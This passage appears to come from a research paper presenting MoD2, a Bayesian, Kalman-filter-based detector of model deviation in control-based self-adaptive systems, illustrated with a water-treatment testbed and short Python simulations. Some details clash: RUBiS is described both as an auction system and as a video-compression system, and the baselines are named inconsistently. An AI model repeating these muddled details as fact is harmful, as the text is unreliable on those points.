The problem of model deviation has been acknowledged in the literature, but to our knowledge no satisfactory solution has been given [10, 11, 23, 44, 49, 60]. Using robust controllers [11, 44] can mitigate the problem by tolerating slight deviations, at the cost of less optimality and more complexity in controller design, but the problem itself remains. Some authors proposed to monitor system outputs and rebuild the controller through system re-identification once the outputs violate some specified criteria [10, 23, 49]. However, this approach is insufficiently sensitive, in that model deviations could have happened much earlier than their manifestation as abnormal outputs. It is crucial to report dangerous deviations as early as possible, before they cause disastrous consequences. Sliding window-based model deviation detection approaches [12, 23, 35] require extensive domain knowledge and human effort to tune their parameters. The emerging learning-based approaches [17, 57] reduce the dependence on domain knowledge and human effort, but are not fast and accurate enough, as shown in Section 5.

An alternative is to monitor the managed system's model parameter values directly, which saves the time it takes a model deviation to propagate to the managed system's abnormal output. Since the nominal model's parameter values are unobservable, one has to calculate them from the observable inputs and outputs. However, both internal uncertainty (e.g., process noise) and external uncertainty (e.g., measurement error) lead to inaccurate calculation. A sliding window can alleviate the impact of measurement error to some extent, but it is less effective in handling slight model deviation, and still faces the problem of manually tuned parameters.

In this paper, we propose the Model-guided Deviation Detector (MoD2) to support timely and accurate model deviation detection for control-SASs.
The key intuition of MoD2 is to estimate the nominal model's parameter values. Unlike most existing work, which treats the nominal model's parameter as a deterministic variable, MoD2 describes the parameter as a stochastic variable. The identified value is considered the parameter's mean, and we additionally identify the parameter's variance. By leveraging knowledge of the parameter's distribution, MoD2 uses Bayesian estimation to achieve an effective estimation of its value. MoD2 also integrates two lightweight techniques, namely uncertainty compensation and safe region quantification, to further improve its accuracy without sacrificing too much timeliness.

Based on MoD2, an adaptation-supervision mechanism is implemented to alleviate the impact of model deviation with a dual-track adaptation strategy. The mechanism uses a supervision loop to guard the adaptation loop of a control-SAS. Once MoD2 detects model deviation, our mechanism switches from the control theory-based optimal controller to a mandatory controller that ensures the mandatory requirements but may sacrifice some system utility. When the model deviation disappears, the SAS can switch back to the optimal controller.

We evaluate our approach on three representative exemplar SAS systems, namely SWaT [8], RUBiS [18], and a video encoder [50]. We compare MoD2's performance with two baseline approaches (a sliding window-based detector [23] and an SVM-based detector [17]). The results show the effectiveness of MoD2, which achieves 93.3% shorter detection delay, a 39.4% lower FN rate, and a 25.2% lower FP rate, as well as the usefulness of the MoD2-based adaptation-supervision mechanism, which reports a 29.2% lower abnormal rate.

In the remainder of this paper, Section 2 gives the necessary background and discusses the motivation of our work. Section 3 introduces the adaptation-supervision mechanism, and Section 4 details MoD2's three main techniques.
Section 5 presents the experimental evaluation of our approach. Finally, Section 6 discusses related work, and Section 7 concludes the paper.

## 2 BACKGROUND AND MOTIVATION

In this section, we first introduce the background of control-SASs, with a motivating example of the Secure Water Treatment testbed (SWaT for short) [8]. We then discuss the impact of model deviation on self-adaptive systems, as well as the limitations of existing approaches in handling it. Next, we introduce Bayesian estimation and the Kalman filter for estimating model parameter values. Finally, we discuss our scope and assumptions in addressing the problem of model deviation.

### 2.1 Control-based self-adaptive systems

In recent years, control-based self-adaptive systems [16, 23, 25, 26, 56, 59, 63] have become a research hotspot because they reduce the burden on developers' mathematical and software knowledge when designing ad-hoc self-adaptation solutions. Filieri et al. first proposed a methodology (the push-button method [23]) for implementing control-SASs, which includes a systematic data collection and model fitting procedure (a.k.a. system identification [48]) and a control theory-guided controller designing procedure (a.k.a. controller synthesis). The identification procedure enables the automatic construction of an approximate model of the managed system, and the synthesized controller provides theoretical guarantees on the derived managing system's behavior in controlling adaptation.

Specifically, in system identification, control-SASs assume that the managed system's behavior can be captured by a quantitative nominal model, to improve productivity and cope with infinitely many kinds of environmental dynamics. A nominal model describes the relationship between the managed system's output, the controller's output, and the environmental input.
Many types of nominal models have been proposed to support self-adaptation in various scenarios, including linear time-invariant systems [4, 35, 61], linear time-varying systems [37], and nonlinear time-invariant systems [11]. In controller synthesis, control-SASs leverage various control-theoretical techniques to design optimal controllers for various scenarios. Two of the most prevalent techniques are proportional-integral-derivative (PID) control [24, 44, 60] and model predictive control [4, 5, 49, 51]. A controller's workflow resembles the conventional self-adaptation mechanism, consisting of continuous adaptation loops of monitoring, analyzing, planning, and executing. A controller's behavior should be subject to control properties such as the SASO properties (stability, accuracy, settling time, and overshoot) [36].

Here, we use the SWaT system to explain the concepts of control-SASs. SWaT is a fully operational scaled-down water treatment plant that produces doubly-filtered drinking water. SWaT consists of five water-processing tanks and the pipes connecting them. The in-coming valve and out-going valve of each tank can be controlled remotely. The objective of a self-adaptive SWaT system is to enable safe (e.g., no overflow or underflow in any of the tanks) and efficient (e.g., maximum clean water production) water filtering under different environmental situations (e.g., the initial water levels of the five tanks and the in-coming water flow of the first tank).

To build such a self-adaptive SWaT system following the control-SAS methodology, we can use the following linear time-invariant system to describe SWaT in system identification:

\[
\begin{aligned}
\hat{x}(k) &= A \cdot \hat{x}(k-1) + B \cdot \hat{u}(k-1) \\
y(k) &= C \cdot \hat{x}(k)
\end{aligned}
\tag{1}
\]

where \(k\) denotes the serial number of the adaptation loop.
For the variables, \(\hat{x}(k)\) describes SWaT's current running state (i.e., the in-coming and out-going water of the five tanks), \(\hat{x}(k-1)\) describes the historical state, \(y(k)\) describes the system's output value (i.e., the measured water levels of the five tanks), and \(\hat{u}(k-1)\) describes its received control signal (i.e., the valves' opening times in an adaptation loop). The parameters in Equation 1, namely \(A\), \(B\), and \(C\), are identified for the system, since their values cannot be measured directly. Each of these parameters represents a specific dynamical feature of SWaT. Specifically, \(A\) represents the system's delay property, which describes the interval between the time when a controller requests to turn a valve on/off and the time when the valve is actually turned on/off. \(B\) represents the system's controllability, which describes the influence of turning a valve on/off upon the system's running state. \(C\) represents the system's observability, which describes the mapping between each tank's in-coming and out-going water flow and the measured water level.

Based on the identified parameter values, SWaT's developers provide a suite of well-designed controllers to enable the system's adaptation to different environmental situations. These controllers leverage both control theory and rule-based domain knowledge to guide the control strategies of the various valves. Concretely, there are six controllers in total: four control the in-coming and out-going valves of one or two tanks each, while the other two control the general water treatment procedure and coordinate with the first four.

Control theory guarantees that the self-adaptive SWaT system is subject to the control properties. For example, the water in all tanks should neither overflow nor underflow (i.e., the no-overshoot property).
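To make the nominal model concrete, the following is a minimal scalar simulation of Equation 1. The parameter values and the control signal are illustrative assumptions, not SWaT's identified values:

```python
# A minimal scalar instance of the nominal model in Equation 1.
# The values of A, B, C and the control signal u are illustrative
# assumptions, not SWaT's identified parameters.
A = 0.9   # delay feature: how much of the previous state carries over
B = 0.5   # controllability: effect of one unit of valve opening time
C = 1.0   # observability: maps the internal state to the measured level

def adaptation_loop(x_prev, u_prev):
    """One loop: x(k) = A*x(k-1) + B*u(k-1); y(k) = C*x(k)."""
    x = A * x_prev + B * u_prev
    y = C * x
    return x, y

x = 1.0                    # initial water level (internal state)
trace = []
for k in range(3):
    x, y = adaptation_loop(x, u_prev=0.4)
    trace.append(round(y, 4))
# trace now holds the measured levels over three adaptation loops
```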
Meanwhile, the water level in all tanks should reach the desired level quickly (i.e., the low-settling-time property), in order to maximize SWaT's clean water production.

Many self-adaptive-system researchers acknowledge the existence of model deviation and propose different solutions. In the push-button method [23], Filieri et al. first identified model deviation and addressed it by monitoring system outputs and rebuilding the controller through system re-identification. Other works [10, 24, 49] also rely on re-identification to handle model deviation. Some researchers focus on improving the controller's robustness to tolerate slight deviations [11, 44].

These solutions have their own limitations. For the robustness-strengthening approaches, model deviation does cause controllers designed by field experts to behave abnormally, as in our motivating example of SWaT; we cannot simply assume that developer-designed controllers can overcome model deviation, as in [11, 44]. For the re-identification approaches, reacting to abnormal outputs is too slow to be effective, since model deviations could have happened much earlier than their manifestation as abnormal outputs (Kang et al. report that it takes around 5 minutes for a detected attack to fail SWaT's execution [42]). The latency between a model deviation's occurrence and its observable consequences makes it crucial to report dangerous deviations as early as possible.

As discussed in Section 1, the challenge is to balance the detection's timeliness and accuracy, and existing work fails to strike this balance in detecting model deviation. For the sliding window-based approaches that have long been used by self-adaptation researchers [12, 23, 35], performance largely depends on manual or empirical settings (e.g., the size of the sliding window and the threshold for the monitored system's output values). An appropriate setting often requires extensive domain and mathematical knowledge, which is infeasible for non-experts.
The newly-proposed learning-based approaches [17, 57] usually combine multiple test results to improve their detection accuracy, which prolongs their detection delay. Moreover, these approaches often require binary training sets, whose positive instances can hardly be prepared, since the managed system's behavior under model deviation is unpredictable.

Our MoD2 addresses the challenge above under the guidance of the nominal model. First, MoD2 fundamentally decreases its detection delay by deriving the nominal model's parameter values with Bayesian estimation. Second, MoD2 improves its estimation accuracy and detection accuracy with two supporting techniques, namely uncertainty compensation and safe region quantification. Third, MoD2 further reduces the time overhead of its estimation and detection via the Kalman filter and probability-based quantification, respectively.

### 2.2 Model deviation in control-based self-adaptive systems

Model deviation undermines control-SASs. Model deviation is the mismatch between the nominal model's identified parameter values and its actual values at runtime. The occurrence of model deviation may invalidate the theoretical guarantees provided by control theory and can potentially cause abnormal behavior of a control-SAS.

Let us consider two real-world cases of model deviation in SWaT. The first, reported by Adepu et al. [1], is that network attacks can cause SWaT to behave abnormally. For instance, if the controller's signal for turning on a valve is blocked or tampered with, the valve's opening time will change accordingly. Then, even when the controlled tank's water level exceeds an alarming level, the corresponding controller will still control the valves according to the unchanged \(B\) value and cause tank overflow. In the second case, the physical condition of SWaT's pipes and valves also leads to model deviation.
For example, physical abrasion [21] may wear the valves and change the water flow rate (i.e., the system's controllability feature \(B\)). When a controller still controls the valves based on the unchanged \(B\) value, the water flowing into the tank will be less than what the controller expects and may cause the tank to underflow.

### 2.3 Bayesian estimation and Kalman filter

Bayesian estimation [29] enables one to estimate an unobservable parameter value (the value of \(B(k)\) in our case). To improve its accuracy, the approach requires a priori information about the parameter's distribution (i.e., the mean and variance of all \(B\) values collected in system identification). Bayesian estimation works in an iterative manner. In each iteration, we first compute a prior distribution of the concerned parameter that matches the past observations and the identified distribution. The prior is then combined with the current observations to obtain a posterior distribution, which is reported as the current estimated value.

In Bayesian estimation, one has to calculate the prior and posterior distributions in every iteration, which brings considerable overhead. The Kalman filter reduces this overhead by deriving the current prior and posterior distributions through updating the previous ones. Specifically, the Kalman filter uses a recursive factor \(K\) (also called the Kalman gain) to approximate the relationship between the prior/posterior distributions of two or more consecutive iterations. When this relationship is linear or can be approximated linearly, the Kalman filter produces an accurate and fast estimation of the concerned parameter.

### 2.4 Our scope and assumptions

Due to the various application scenarios of self-adaptive systems, the proposed MoD2 has its scope and assumptions, for ease of discussion and presentation. We delineate our scope based on existing work and inherit pre-existing assumptions from other self-adaptation and control theory research.
Note that we only state our assumptions and argue for their realism here; we will discuss the limitations MoD2 inherits from these assumptions in Section 4.4.

**Nominal model.** In this work, we focus on linear time-invariant systems (LTI systems for short). The LTI system is one of the most widely-used models among self-adaptation researchers [35, 49, 60], and has been successfully applied to different subjects [4, 61].

**Model deviation.** We focus on two types of model deviation, discrete behavior and inaccurate environmental interaction, following the two cases reported in our motivating example of SWaT. One occurs when a controller produces its control signals (e.g., the instruction to open the valves is blocked or tampered with), and the other occurs when the managed system receives the control signals (e.g., the water flow changes due to physical abrasion). Based on these two types of model deviation, we focus in this work on the deviation of the managed system's controllability feature (i.e., the parameter \(B\)) and assume that the managed system's delay and observability features (i.e., parameters \(A\) and \(C\)) are comparatively stable. Recent literature [1, 2, 41] reports and validates the deviation of the controllability feature. We also assume that \(B(i)\) is a unary parameter, for ease of presentation; nevertheless, our approach can be applied to a multinary parameter.

**Environmental uncertainty.** Environmental uncertainty is the known-unknown information at runtime [4, 20]. As a result, one has to model the target uncertainty before addressing it. In this paper, we assume that the environmental uncertainty can be described by a linear time-invariant model or a normal distribution. The former is a widely used approach for describing uncertain environmental input in control theory [13, 62], and the latter is a typical setting for describing uncertainty's influence in self-adaptive systems [19, 64].
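The Bayesian prior/posterior update and the Kalman gain described above can be sketched for a single scalar parameter. All numeric values here are illustrative, not drawn from the paper's experiments:

```python
# A minimal scalar Kalman filter illustrating the Bayesian estimation
# background described above. All numeric values are illustrative.
def kalman_step(mean, var, z, process_var, measurement_var):
    # Predict: the prior widens by the process noise (random-walk step).
    prior_mean, prior_var = mean, var + process_var
    # Update: the Kalman gain K weighs the prior against observation z.
    K = prior_var / (prior_var + measurement_var)
    post_mean = prior_mean + K * (z - prior_mean)
    post_var = (1.0 - K) * prior_var
    return post_mean, post_var

# Identified (a priori) distribution of the parameter, then four noisy
# observations of a true value near 1.0.
mean, var = 0.0, 1.0
for z in [0.9, 1.1, 1.0, 0.95]:
    mean, var = kalman_step(mean, var, z,
                            process_var=0.01, measurement_var=0.25)
# mean has moved toward 1.0 and var has shrunk with each observation
```

Note how the gain `K` shrinks as the posterior variance decreases: later observations move the estimate less, which is exactly the "combining past observations" behavior MoD2 relies on later.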
## 3 AN ADAPTATION-SUPERVISION MECHANISM

To address the problem of model deviation, this paper proposes an adaptation-supervision mechanism to supervise the execution of control-SASs, as shown in Figure 1. Intuitively, we add a new, parallel supervision loop to a control-SAS. The supervisor continuously monitors the adaptation loop. When model deviation is detected, the supervisor immediately "falls back" to a safer (but less efficient) mandatory controller, and returns to the main control loop after successful model re-identification. The supervisor consists of three major components: a model-guided deviation detector (MoD2, this paper's primary focus), a mandatory controller, and a switcher. Underlined blocks in Figure 1 denote these newly added components.

In the adaptation-supervision mechanism, we first require the system designer to provide a mandatory controller that guarantees minimal system functionality (i.e., the mandatory requirements) even under nominal-model deviation. Mandatory controllers have been extensively studied in the control-SAS community, e.g., ones adopting architecture-guided [27] or goal-driven rules [58]. Given both the control theory-based optimal controller and the mandatory controller, the switcher coordinates the two based on MoD2's detection results. On model deviation, the switcher immediately changes the adaptation loop from the optimal controller to the mandatory controller, to reduce the unpredictable influences to a minimum. The switcher is also responsible for subsequently conducting model re-identification and turning back to the optimal controller when the abnormal situation has disappeared (e.g., the network attack on SWaT has been blocked by a firewall). The switcher can be implemented following the push-button method [23]. Therefore, the design of an efficient and effective model-deviation detector (our MoD2) is the key point.
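The switcher's dual-controller logic can be sketched as follows. The controller and detector interfaces are hypothetical, and the sketch simplifies one step: the mechanism described above switches back only after successful model re-identification, which is omitted here.

```python
# A minimal sketch of the adaptation-supervision switcher. The controller
# and detector interfaces are hypothetical; the real mechanism also
# performs model re-identification before switching back.
class Switcher:
    def __init__(self, optimal, mandatory, detector):
        self.optimal = optimal          # control theory-based controller
        self.mandatory = mandatory      # safe fallback controller
        self.detector = detector        # deviation detector, e.g., MoD2
        self.using_mandatory = False

    def control(self, y):
        if self.detector(y):
            self.using_mandatory = True     # fall back on model deviation
        else:
            self.using_mandatory = False    # deviation gone: switch back
        controller = self.mandatory if self.using_mandatory else self.optimal
        return controller(y)

# Toy setpoint-tracking controllers and a threshold-based toy detector.
sw = Switcher(optimal=lambda y: 1.0 - y,            # aggressive correction
              mandatory=lambda y: 0.1 * (1.0 - y),  # conservative correction
              detector=lambda y: abs(y - 1.0) > 0.5)
signals = [sw.control(y) for y in [1.0, 1.2, 2.0, 1.1]]
```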
## 4 MoD2: MODEL-GUIDED DEVIATION DETECTOR

The three major technical designs (and contributions) of the proposed MoD2 are:

1. MoD2 directly estimates the nominal model's parameter values by modeling the nominal model's parameter \(B\) as a time-variant stochastic variable \(B(k)\). In contrast with existing work, which is mostly based on the observable outputs \(y(k)\), this white-box approach accelerates model-deviation detection and improves its accuracy.
2. MoD2 compensates for environmental uncertainty in the nominal model by introducing compensation terms that reduce the consequences of measurement errors, yielding improved model-deviation estimation accuracy. MoD2 adopts the Kalman filter, a fast Bayesian estimator, to accelerate its estimation of the parameter values.
3. MoD2 directly quantifies the nominal model's theoretical safe region, without the need to calibrate an empirical threshold based on execution traces of the managed system. By using the necessary conditions under which model deviation can make the controller behave abnormally, MoD2 directly (and thus timely) reports model deviation with sufficient probabilistic confidence.

These technical details are elaborated as follows.

### 4.1 Parameter deviation estimation

We first describe the concerned model parameter \(B\) as a time-variant stochastic variable \(B(k)\):

$$B(k) = B(k-1) + \omega \cdot (\hat{B} - B(k-1)) + q(k) \tag{2}$$

where: (1) the parameter's deviation is described as a sudden change of the centripetal force \(\omega\) that drives \(B(k)\) away from the identified \(\hat{B}\); and (2) the parameter's inherent fluctuation is described as a random walk whose step follows a normal distribution \(q(k)\). If the system is free from model deviation (i.e., \(\omega = 0\)), the variance of \(q(k)\) equals the variance of \(B(k)\), which can be acquired along with the identification of \(\hat{B}\).
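Equation 2 can be sketched as a simulation. Per the text, \(\omega = 0\) means a deviation-free system in which \(B(k)\) only fluctuates by \(q(k)\); the choice of a negative \(\omega\) below is an illustrative assumption for how a sudden change of \(\omega\) could drive \(B(k)\) away from \(\hat{B}\), since the text does not pin down the deviated dynamics.

```python
import random

# Simulating the parameter dynamics of Equation 2 (illustrative values):
#   B(k) = B(k-1) + omega * (B_hat - B(k-1)) + q(k)
# With omega = 0 (deviation-free), B(k) only fluctuates by the small
# random-walk step q(k). A sudden change of omega (here, illustratively,
# to a negative value) drives B(k) away from the identified B_hat.
random.seed(7)
B_hat = 0.5     # identified nominal value of B
q_std = 0.01    # std dev of the inherent fluctuation q(k)

def next_B(B_prev, omega):
    return B_prev + omega * (B_hat - B_prev) + random.gauss(0.0, q_std)

B = B_hat + 0.02                 # start slightly off the nominal value
normal_run, deviated_run = [], []
for _ in range(50):              # deviation-free phase: omega = 0
    B = next_B(B, omega=0.0)
    normal_run.append(B)
for _ in range(50):              # deviation phase: omega suddenly negative
    B = next_B(B, omega=-0.1)
    deviated_run.append(B)
# normal_run hovers near B_hat; deviated_run drifts away from it
```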
Combining Equation 1 and Equation 2 enables MoD2 to estimate the value of \(B(k)\) in a Bayesian manner. Specifically, in the \(i\)-th adaptation loop, a prior distribution of \(B(i)\) is computed that fits the previous posterior distribution of \(B(i-1)\) and the identified variance of \(q(k)\), according to Equation 2. Then, MoD2 calibrates the posterior distribution of \(B(i)\) by updating the prior distribution of \(B(i)\) with the current observation (i.e., \(\hat{x}(i-1)\), \(\hat{u}(i-1)\), and \(y(i)\)), according to Equation 1.

Note that in some cases we cannot observe the value of the system state \(\hat{x}(i)\) directly; we then use Bayesian estimation to estimate \(\hat{x}(i)\)'s value as well. In this situation, each iteration of Bayesian estimation has two steps: MoD2 first estimates \(\hat{x}(i-1)\)'s value by treating the previously estimated \(B(i-1)\) as an observation, and the obtained \(\hat{x}(i-1)\) is then used to estimate the current parameter value \(B(i)\).

### 4.2 Uncertainty compensation

Due to various environmental uncertainties, a direct estimation of \(B(i)\)'s value is usually inaccurate. To reduce uncertainty-based errors in the estimation of \(B(i)\), we refine the nominal model by compensating for environmental uncertainty, and we accelerate our estimation with the Kalman filter.

Using compensation terms to refine a nominal model is a widely-used technique in the control theory community [30]; however, effective compensation terms have to be designed carefully. Here, we introduce three different compensation terms. One is the measured environmental input \(a(k)\), which can be used to calibrate our estimated value of \(B(i)\) a posteriori; we use a linear time-invariant model to describe the influence brought by environmental input. The other two compensation terms, \(w(k)\) and \(v(k)\), capture the influences of measurement errors on the managed system's internal state and external behavior, respectively.
According to our assumptions, we depict \(w(k)\) and \(v(k)\) as normal distributions with variances \(W\) and \(V\). The nominal model (Equation 1) is then refined with the three compensation terms as follows:

$$\hat{x}(k) = A \cdot \hat{x}(k-1) + B(k) \cdot \hat{u}(k-1) + \gamma \cdot a(k) + w(k)$$
$$y(k) = C \cdot \hat{x}(k) + v(k) \tag{3}$$

where \(\gamma\) is the coefficient of the linear model that describes \(a(k)\). The value of \(\gamma\) is acquired during system identification, along with the other model parameters.

Based on Equation 3, MoD2 further alleviates the impact of measurement error by transforming the nominal model into difference equations. In the original nominal model, the measurement error on a parameter value (e.g., \(A\)) is multiplied by other variables (e.g., \(\hat{x}(k-1)\)); as a result, a large variable value amplifies the measurement error and makes the subsequent estimation less accurate. MoD2 uses the difference equations to address this multiplier effect. If the managed system's behavior is free from severe changes, a variable's values in two consecutive adaptation loops should not differ much [14, 55], and the difference equations can thus alleviate the multiplier effect; otherwise, the change itself is large enough to be easy to detect.

In this paper, we use \(\Delta\alpha(k)\) to denote the difference between variable \(\alpha\)'s values in the \(k\)-th and \((k-1)\)-th adaptation loops (i.e., \(\Delta\alpha(k) = \alpha(k) - \alpha(k-1)\)). The difference equations of the nominal model are then as follows:

$$\Delta \hat{x}(k) = A \cdot \Delta \hat{x}(k-1) + B(k) \cdot \Delta \hat{u}(k-1) + \gamma \cdot \Delta a(k) + \Delta w(k)$$
$$\Delta y(k) = C \cdot \Delta \hat{x}(k) + \Delta v(k) \tag{4}$$

Notice that if the controller's control signal remains unchanged, the difference equations are ineffective, since the estimated \(B\) is eliminated by the zero multiplier (\(\Delta \hat{u}(k-1) = \hat{u}(k-1) - \hat{u}(k-2) = 0\)).
In this situation, we use the original nominal model instead of the difference equations to estimate \(B(k)\)'s value.

With these compensation terms introduced, performing the original Bayesian estimation would be extremely time-consuming. MoD2 accelerates its estimation by using the Kalman filter [43, 45], a more efficient linear quadratic estimation approach. Conceptually, the Kalman filter works by updating the prior distribution of \(B(i)\) with the latest observation only (i.e., \(\tilde{x}(i-1)\), \(\tilde{u}(i-1)\), and \(y(i)\)), instead of re-calculating the prior from all historical observations (i.e., \(\tilde{x}(0)\)–\(\tilde{x}(i-1)\), \(\tilde{u}(0)\)–\(\tilde{u}(i-1)\), and \(y(0)\)–\(y(i)\)). MoD2's Kalman-filter parameter estimation works iteratively, like the original Bayesian estimation, but it gives a more accurate normal distribution of the estimated parameters by filtering out the effects of the compensation terms (i.e., \(a(i)\), \(w(i)\), and \(v(i)\)).

### 4.3 Safe region quantification

Once the distribution of \(B(i)\) is estimated, MoD2 has to check whether the system suffers from model deviation. We combine the nominal model in Equation 4 with a theoretical safe region and use a cumulative distribution function to calculate the probability that \(B(i)\)'s actual value remains within the safe region.

Unlike existing works that use a manual or empirical threshold, MoD2's safe region represents the necessary condition under which the controller's behavior is guaranteed by control theory. As a result, MoD2 can distinguish normal executions from abnormal ones even when those executions have not been empirically explored, which makes its detection more accurate. It is control theory, which helps developers design the original controllers, that shapes the safe regions of the derived controllers. A controller's safe region can be captured by either formal analysis or experimental study.
For PID and MPC controllers, the safe region can be theoretically derived by frequency response analysis [38, 40] and linear matrix inequalities [31], respectively. How to capture a theoretical safe region is out of our scope. If it is extremely hard to capture the theoretical safe region of a complex controller, we fall back to empirical study or statistical analysis of the execution traces. Formally, parameter $B$’s safe region $\Theta_B$ is defined as the interval between a lower bound $\Theta^L_B$ and an upper bound $\Theta^U_B$. Given a controller’s safe region $\Theta_B$, $B(i)$’s cross-border detection can still be inaccurate due to the estimation error of $B(i)$’s value. Most existing works combine possible results from different adaptation loops to improve their accuracy, which inevitably delays their detection. MoD2’s estimated distribution of the parameter value naturally combines the past observations and avoids multi-time detections. MoD2 uses a probability-based approach to detect $B$’s deviation with a confidence level $CI$. The probability that $B(i)$’s value falls within the safe region $[\Theta^L_B, \Theta^U_B]$ is calculated by a cumulative distribution function, as shown in Equation 5, where $f_{B(i)}(x)$ is $B(i)$’s probability density function. In particular, the estimated $B(i)$ in our case is subject to a normal distribution (i.e., $B(i) \sim \mathcal{N}(\mu(i), \sigma(i))$). If the derived probability $\hat{p}(i)$ falls below the confidence level $CI$, MoD2 reports model deviation and triggers the switching of adaptation. $$\hat{p}(i) = \int_{\Theta^L_B}^{\Theta^U_B} f_{B(i)}(x) \, dx$$ (5) MoD2 also uses an active detector, based on hypothesis testing, to reveal possible model deviation in the situation when the optimal controller produces no control signal.
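Since $B(i) \sim \mathcal{N}(\mu(i), \sigma(i))$, Equation 5 reduces to a difference of normal CDFs. A small self-contained sketch (safe-region bounds, estimates, and the confidence level are hypothetical numbers, Python standard library only):

```python
from math import erf, sqrt

def normal_cdf(x, mu, sigma):
    """CDF of the normal distribution N(mu, sigma^2)."""
    return 0.5 * (1.0 + erf((x - mu) / (sigma * sqrt(2.0))))

def prob_in_safe_region(mu, sigma, lower, upper):
    """P(lower <= B(i) <= upper) for B(i) ~ N(mu, sigma^2), as in Equation 5."""
    return normal_cdf(upper, mu, sigma) - normal_cdf(lower, mu, sigma)

# Hypothetical safe region and two estimated distributions of B(i).
LOWER, UPPER = 1.5, 2.5
p_normal = prob_in_safe_region(1.9, 0.1, LOWER, UPPER)    # estimate well inside
p_deviated = prob_in_safe_region(2.7, 0.1, LOWER, UPPER)  # estimate outside

CI = 0.95  # confidence level: report deviation when the probability drops below it
print(p_normal > CI, p_deviated > CI)  # → True False
```

The estimate far inside the region yields an in-region probability near 1, while the out-of-region estimate drops it close to 0, which is what drives the deviation report.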
We use a normal distribution to depict the variation properties (e.g., residuals) of the managed system’s output when no control signal is issued, and detect model deviation by checking whether the measured variation is consistent with the pre-identified distribution. ### 4.4 Discussions on MoD2 **Assumptions and limitations.** In Section 2.4 we listed the assumptions in MoD2’s design. We now discuss the limitations brought by these assumptions, as well as possible solutions to free our approach from them. First, we assume that the managed system’s nominal model is described as an LTI model. Our approach can be directly extended to other types of nominal models since the three major technical designs of MoD2 are independent of the type of the nominal model. Other types of models might make the Kalman filter less effective due to their more complicated forms. However, the extended Kalman filter [43] would alleviate this by supporting non-linear or time-variant nominal models. Second, we assume that the deviated parameter is the controllability parameter (i.e., $B$) only, and that the parameter has a unary description. Since our parameter estimation of $B(k)$ requires no more than the identified values of the other two parameters (i.e., $A$ and $C$), MoD2 can also be extended to detect model deviation on either of these two parameters. However, detecting model deviation on multiple parameters simultaneously is challenging and remains open. As explained previously, $B$’s unary description is for ease of discussion only; MoD2 can also be applied to a multi-dimensional parameter. In fact, in our later experiments, we already run MoD2 to detect model deviation on binary parameters (with subject SWaT [8]). Third, we assume that the compensated uncertainty terms can be described by normal distributions.
Though normal distributions apply to most types of uncertainties reported by recent literature [19, 64], our approach can adapt to other types of uncertainty models by estimating the parameter value with other filters, such as the particle filter. **Parameter as stochastic variable.** To the best of our knowledge, all existing works treat the nominal model’s parameters as deterministic variables. Different from these works, MoD2 considers the concerned parameter as a stochastic variable, which is the key to the estimation in our approach. Besides the parameter’s mean value derived through system identification, we additionally use the parameter’s variance to make our estimation robust against the parameter’s inherent fluctuation. Leveraging the parameter’s variance does not bring a significant burden to our approach. In fact, during system identification, such variance information is collected but eventually overlooked. In system identification, the parameter’s value is derived from a collection of execution traces of the managed system. Since different traces could infer different candidate parameter values, linear regression is introduced to predict a parameter value that best fits all execution traces. Conventional system identification only reports this fitted value, and the candidate values are simply discarded. However, when the nominal model’s parameter is treated as a stochastic variable, those candidates actually reflect the inherent fluctuation of the parameter. As such, in MoD2, the fitted value is taken as the mean value of the parameter, and the spread of the candidate values as its variance. We evaluate the effectiveness and usefulness of MoD2 and the MoD2-based adaptation-supervision mechanism with the following research questions: RQ1 Can MoD2 timely and effectively detect model deviation for self-adaptive systems?
RQ2 How useful is the MoD2-based adaptation-supervision mechanism in terms of avoiding abnormal self-adaptation behavior? 5 EXPERIMENTS 5.1 Experiment setup 5.1.1 Experimental subjects. We selected three prevalent subject systems from the community of self-adaptive systems. Each subject is provided with a control theory-derived controller and a mandatory controller, both of which are either given by the subject’s developers or implemented following existing works. - SWaT, the water treatment testbed described in Section 2. The original control theory-derived controller is inherited from the programmable logic controllers in [17]. The mandatory controller (developed following [27, 58]) keeps the tank water level between the upper and lower alarm levels. - RUBiS, a web auction system (studied in [11, 44, 54]) that can adaptively change compression parameters to balance the throughput and video quality. The original control theory-derived controller (also from [23]) adjusts the compression parameters to achieve smooth and high-resolution video streams. The mandatory controller (also developed following [27, 58]) keeps a no-lagging video stream by decreasing the compression parameter values accordingly. - Encoder, a video compression and streaming system designed for high system utilization and low response time. The original control theory-derived controller from [44] is tuned for high system utilization and low response time. The mandatory controller from [44] guarantees in-time response and maintains affordable system utilization. 5.1.2 Test configurations. We conducted the experiments over a series of predefined test configurations (configurations for short), comparing MoD2 to SWDetector and LFM. Given a subject system, each configuration is a simulated system run that contains at most one model deviation. A configuration is negative if it contains no model deviation. Otherwise, a configuration that contains one model deviation is categorized as positive.
Since the subject’s controllability features (i.e., the value of B) cannot be directly manipulated, we simulate model deviation resulting from discrete behavior by changing the subject’s parameter values, and from inaccurate environmental interaction by changing its environmental inputs. Specifically, a configuration is denoted by a quintuple \((env_i, env_d, para_i, para_d, t)\), in which \(env_i\) and \(env_d\) denote the initial and deviated environmental inputs, \(para_i\) and \(para_d\) denote the initial and deviated model parameters, and \(t\) denotes the time point of model deviation. Initially, the subject and its running environment are set up with the initial parameters \(para_i\) and \(env_i\). At time point \(t\), the model parameter is changed to \(para_d\) and the environmental input is changed to \(env_d\). For a negative configuration, \(para_i = \ldots\) Table 2: Comparison of MoD2 and SWDetector <table> <thead> <tr> <th></th> <th>SWaT⁻ &amp; SWaT⁺</th> <th>RUBiS⁻ &amp; RUBiS⁺</th> <th>Encoder⁻ &amp; Encoder⁺</th> </tr> </thead> <tbody> <tr> <td>MTD(s)</td> <td>4.00</td> <td>0.00</td> <td>0.00</td> </tr> <tr> <td>FN(%)</td> <td>2.50</td> <td>0.11</td> <td>1.50</td> </tr> <tr> <td>FP(%)</td> <td>0.00</td> <td>0.00</td> <td>0.00</td> </tr> <tr> <td>OT (time(s))</td> <td>10.00</td> <td>0.00</td> <td>0.01</td> </tr> </tbody> </table> Table 1 describes our configurations; we designed them on our own since no existing settings were available. Each group includes 200 different configurations.
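The quintuple above can be encoded directly; the sketch below (field values are hypothetical, Python) also shows how the negative/positive categorization and the deviation injection at time \(t\) follow from the definition:

```python
from collections import namedtuple

# (env_i, env_d, para_i, para_d, t): initial / deviated environmental input,
# initial / deviated model parameters, and the model-deviation time point.
Config = namedtuple("Config", ["env_i", "env_d", "para_i", "para_d", "t"])

def is_negative(cfg):
    """Negative configurations contain no model deviation at all."""
    return cfg.para_i == cfg.para_d and cfg.env_i == cfg.env_d

def active_state(cfg, now):
    """Model parameter and environmental input in effect at time `now`."""
    if now < cfg.t:
        return cfg.para_i, cfg.env_i
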